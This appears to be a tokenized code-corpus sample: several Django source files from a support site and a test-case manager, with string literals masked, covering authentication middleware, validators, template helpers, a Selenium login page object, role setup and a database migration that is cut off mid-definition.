<s> """<STR_LIT>""" <EOL> from taggit . models import Tag <EOL> def add_existing_tag ( tag_name , tag_manager ) : <EOL> """<STR_LIT>""" <EOL> tag = Tag . objects . get ( name__iexact = tag_name ) <EOL> tag_manager . add ( tag ) <EOL> return tag . name </s>
<s> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . contrib . auth import authenticate , login , logout <EOL> from django . http import HttpResponseRedirect <EOL> from django . utils . translation import ugettext_lazy as _lazy <EOL> from kitsune . sumo . urlresolvers import reverse <EOL> class TokenLoginMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> try : <EOL> auth = request . GET . get ( '<STR_LIT>' ) <EOL> except IOError : <EOL> return <EOL> if auth is None or ( request . user and request . user . is_authenticated ( ) ) : <EOL> return <EOL> user = authenticate ( auth = auth ) <EOL> if user and user . is_active : <EOL> login ( request , user ) <EOL> msg = _lazy ( u'<STR_LIT>' ) <EOL> messages . success ( request , msg ) <EOL> class LogoutDeactivatedUsersMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> user = request . user <EOL> if ( user . is_authenticated ( ) and not user . is_active and <EOL> not request . session . get ( '<STR_LIT>' , False ) ) : <EOL> logout ( request ) <EOL> res = HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> res . delete_cookie ( settings . SESSION_EXISTS_COOKIE ) <EOL> return res </s>
<s> from django . core . validators import RegexValidator <EOL> TwitterValidator = RegexValidator ( r'<STR_LIT>' , <EOL> message = '<STR_LIT>' , <EOL> code = '<STR_LIT>' ) </s>
<s> import jinja2 <EOL> from django_jinja import library <EOL> from kitsune . sumo import parser <EOL> from kitsune . wiki . diff import BetterHtmlDiff <EOL> @ library . global_function <EOL> def diff_table ( content_from , content_to ) : <EOL> """<STR_LIT>""" <EOL> html_diff = BetterHtmlDiff ( ) <EOL> diff = html_diff . make_table ( content_from . splitlines ( ) , content_to . splitlines ( ) , context = True ) <EOL> return jinja2 . Markup ( diff ) <EOL> @ library . global_function <EOL> def generate_video ( v ) : <EOL> return jinja2 . Markup ( parser . generate_video ( v ) ) </s>
<s> import os <EOL> from dennis . cmdline import click_run <EOL> ROOT = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> def path ( components ) : <EOL> return os . path . join ( ROOT , * components ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> click_run ( ) </s>
<s> from pages . desktop . base import Base <EOL> from selenium . webdriver . common . by import By <EOL> class LoginPage ( Base ) : <EOL> """<STR_LIT>""" <EOL> URL_TEMPLATE = '<STR_LIT>' <EOL> _page_title = '<STR_LIT>' <EOL> _username_box_locator = ( By . ID , '<STR_LIT>' ) <EOL> _password_box_locator = ( By . ID , '<STR_LIT>' ) <EOL> _log_in_button_locator = ( By . CSS_SELECTOR , "<STR_LIT>" ) <EOL> _login_error_locator = ( By . CSS_SELECTOR , '<STR_LIT>' ) <EOL> _logged_in_as_div_locator = ( By . CSS_SELECTOR , '<STR_LIT>' ) <EOL> _logged_in_text = '<STR_LIT>' <EOL> def log_in ( self , username , password ) : <EOL> self . selenium . find_element ( * self . _username_box_locator ) . send_keys ( username ) <EOL> self . selenium . find_element ( * self . _password_box_locator ) . send_keys ( password ) <EOL> self . selenium . find_element ( * self . _log_in_button_locator ) . click ( ) <EOL> if not self . header . is_user_logged_in : <EOL> error = self . selenium . find_element ( * self . _login_error_locator ) . text <EOL> error = "<STR_LIT>" % username + error <EOL> raise AssertionError ( error ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . management . base import NoArgsCommand <EOL> from moztrap . model . core . auth import Role , Permission <EOL> ROLES = { } <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> class Command ( NoArgsCommand ) : <EOL> help = ( "<STR_LIT>" ) <EOL> def handle_noargs ( self , ** options ) : <EOL> verbosity = int ( options . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> for role_name , perms in ROLES . iteritems ( ) : <EOL> role , created = Role . objects . get_or_create ( name = role_name ) <EOL> if not created : <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % role_name ) <EOL> continue <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % role_name ) <EOL> for perm_label in perms : <EOL> app_label , codename = perm_label . split ( "<STR_LIT:.>" ) <EOL> try : <EOL> perm = Permission . objects . get ( <EOL> content_type__app_label = app_label , <EOL> codename = codename ) <EOL> except Permission . DoesNotExist : <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % perm_label ) <EOL> continue <EOL> role . permissions . add ( perm ) <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % perm_label ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> 